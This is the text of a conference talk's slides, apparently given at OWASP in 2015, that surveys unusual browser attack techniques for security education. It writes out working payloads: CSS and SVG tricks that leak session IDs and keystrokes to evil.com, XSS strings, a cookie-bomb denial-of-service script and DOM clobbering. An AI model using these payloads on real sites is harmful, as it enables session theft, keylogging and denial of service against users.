I Didn't See That Coming
OWASP Cluj-Napoca 29th January 2015
Who am I?
CSS
HTML
SCRIPTS
Cascading Style Sheets
Style sheet language used for describing the look and formatting of a document written in a markup language.
Facts
18 years old;
Invented by Opera CTO Håkon Wium Lie;
It was a competitor to Netscape's JSSS;
Originally it was a "Style Sheet Language".
Problems
CSS Expressions (IE 5-10)
Data Leakage via Attribute-Selector
Mutation XSS
And ++
<p style=color:expression(alert(1))>
IN: <p style="font-family":'\22\3bx:expression(alert(1))/*'">
OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
SESSIONS OWNAGE
CSS
@-moz - Gecko-engine-specific rule
document - Rule that restricts the style rules contained within it based on the URL of the document.
regexp("") {} - Regular expressions are patterns used to match character combinations in strings.
ul li:nth-child(n){} - Selector matches every element that is the nth child, regardless of type, of its parent.
background:url() - Load Background file from other source.
Attack
@-moz-document regexp(".*PHPSESSID=0.*"){
ul li:nth-child(1){background:url(//evil.com/?character:0#position:0)}
}
@-moz-document regexp(".*PHPSESSID=.0.*"){
ul li:nth-child(2){background:url(//evil.com/?character:0#position:1)}
}
Brute-force 0-9 | a-z | A-Z
http://html5sec.org/cssession/?PHPSESSID=SESSION_ID
For more information check Mario Heiderich research.
http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf
http://www.slideshare.net/x00mario/stealing-the-pie
KEYLOGGER
SVG
Scalable Vector Graphics is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation.
set - The ‘set’ element provides a simple means of just setting the value of an attribute for a specified duration.
attributeName - link:href.
to - Specifies the value for the attribute during the duration of the ‘set’ element.
accessKey() - Describes a key press event and an optional offset that will begin the element.
SVG
Attack
<svg height="0px">
<image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
<set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
...
<set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" />
</image>
</svg>
Map: a-z | A-Z | 0-9
http://html5sec.org/keylogger/
For more information check Mario Heiderich research.
http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf
http://www.slideshare.net/x00mario/stealing-the-pie
CONDITIONAL
COMPILATION
What is it?
Conditional compilation lets you dictate to IE whether to compile certain parts of your JScript or JavaScript code depending on predefined and user defined conditions.
Supported in Internet Explorer (4-10);
Lost...
<script>
/*@cc_on @*/
/*@
document.write("JavaScript version: " + @_jscript_version + ".");
document.write("<br />");
@if (@_win32)
document.write("Running on the 32-bit version of Windows.");
@elif (@_win16)
document.write("Running on the 16-bit version of Windows.");
@else
document.write("Running on a different operating system.");
@end
@*/
</script>
But as always
<script>@set@a=1alert(1)</script>
Local Page
COOKIE BOMB
let's break the Internet!
How? Cookies.
What? Your browser will keep sending those cookies and servers will reject the requests.
Why? Because Cookie header will be very long.
Result: The entire Internet will look down to you.
Some technical info
Max cookie size: 4k;
Max number of cookies: No idea but enough;
What do I need? JS Execution on a Domain including Subdomains.
Attack
var pollution = Array(4000).join('a');
for(var i=1;i<99;i++){
document.cookie='bomb'+i+'='+pollution+';'
}
Any Site
For more information check Egor Homakov research.
http://homakov.blogspot.ro/2014/01/cookie-bomb-or-lets-break-internet.html
PAGE DOS & ++
What are you talking about? User-supplied HTML elements with name attributes matching DOM variables would prevent JavaScript from accessing those variables.
Tell me more... An element like <img src='something.png' name='querySelector'> would cause JavaScript references to document.querySelector to return the image element rather than the querySelector function.
JavaScript namespace clobbering
Examples
<img src="#" name="user-content-top">
<img src="#" name="user-content-window">
<img src="#" name="user-content-location">
<img src="#" name="user-content-document">
<img src="#" name="user-content-history">
<img src="#" name="user-content-screen">
<img src="#" name="user-content-postMessage">
<img src="#" name="user-content-atob">
<img src="#" name="user-content-onload">
<img src="#" name="user-content-onkeyup">
<img src="#" name="user-content-onkeypress">
<img src="#" name="user-content-onkeydown">
<img src="#" name="user-content-images">
<img src="#" name="user-content-head">
<img src="#" name="user-content-body">
<img src="#" name="user-content-cookie">
<img src="#" name="user-content-URL">
<img src="#" name="user-content-domain">
<img src="#" name="user-content-referrer">
<img src="#" name="user-content-title">
For more information check Mathias Karlsson work.
https://bounty.github.com/researchers/avlidienbrunn.html
Remember DOM Clobbering?
<script>
if(top!=self){
top.location=self.location
}
</script>
<form name=self location="javascript:alert(1)"></form>
<script>
if(top!=self){
top.location=self.location
}
</script>
PATCHED!
http://www.thespanner.co.uk/2013/05/16/dom-clobbering/
For more information check Gareth Heyes research.
FILL DISK
Driving people crazy...
Why? For Fun And/Or Profit.
How? HTML5 localStorage.
What? The localStorage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB).
But are there limits?
Yeah..
5 MB per origin in Google Chrome, Mozilla Firefox, and Opera;
10 MB per storage area in Internet Explorer;
25MB per origin on BlackBerry 10 devices.
But...
"Attacking..."
Subdomains are your friends:
1.domain.com; 2.domain.com; ...; N.domain.com.
http://www.filldisk.com/
It's Over!
Credits
Images by sheeps.it
Presentation:
by Renato Rodrigues | @simps0n | pathonproject.com
Content:
Github | html5sec.org | @homakov | @avlidienbrunn | @.mario | @

I Didn't See That Coming (OWASP Cluj-Napoca)
By Renato Rodrigues
I Didn't See That Coming (OWASP Cluj-Napoca)
Weird stuff on the web. An overview of glitches in technology used everyday!
- 8,336